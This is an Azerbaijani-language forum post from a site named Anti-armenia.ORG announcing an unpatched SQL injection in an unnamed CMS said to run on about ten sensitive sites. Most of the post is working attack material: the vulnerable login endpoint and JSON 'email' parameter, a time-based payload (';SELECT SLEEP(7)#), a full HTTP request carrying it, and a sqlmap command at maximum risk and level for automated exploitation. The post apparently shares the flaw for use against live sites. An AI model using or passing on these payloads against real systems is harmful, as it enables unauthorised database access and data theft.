Istifadəçi |
2023-06-04 20:04 GMT |
|
|
|
Gold |
|
Mesaj Sayı : 9 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 1 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : |
Ölkə : |
Məslək : Pentester |
Yaş : |
Mesaj : |
|
Bu CMS təxmini 10+(kritik informasiyalar daşıyan) saytlarda istifadə edilir.
qeyd:
CMS-in hansı saytlarda və hansı ölkədə istifadə edildiyini özüm qeyd etməmişəm.
// 0DAY = SQL Injection
// Müəllif = CyberRuf
// Parameter = JSON(email)
// Növ = boolean-based blind, error-based, stacked queries, time-based blind
// Tarix = {04/17/2023}
^Təsvir^
----------------------------------
<İstifadə edilmiş Alətlər >
Burp Suite, Sqlmap
<Detekt olunması>
1) Saytın giriş hissəsinə gəlirik (/en/login)
2) Daxil olduqda sorğunu tuturuq(burp ilə intercept edirik) və bu sorğuda e-poçt parametrinə ` ';SELECT SLEEP(7)# ` yazırıq
3) Şəkildən də göründüyü kimi cavab 7 saniyədən sonra gəldi – deməli bizim SQL kodumuz (payloadımız) işlədi.
POST /en/login HTTP/2
Host: site.com
Cookie: #cookie
Content-Length: 178
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
Accept: application/json
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0
Sec-Ch-Ua-Platform: "linux"
Origin: https://site.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://site.com/en/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"req_type":"post","action":"login_form","artschema_form_type":"login_form","form_key":"subscription_form_5d00a7131cc5b","email":"';SELECT SLEEP(7)#","password":"tasdasdqwe123@"}
<İstismar>
Biz bu sorğunu txt faylına yaza və sqlmap ilə işimizi daha da asanlaşdıra bilərik.
Sqlmap -r test.txt –random-agent –batch –risk=3 –level=5
|
Anti-armenia.ORG |
|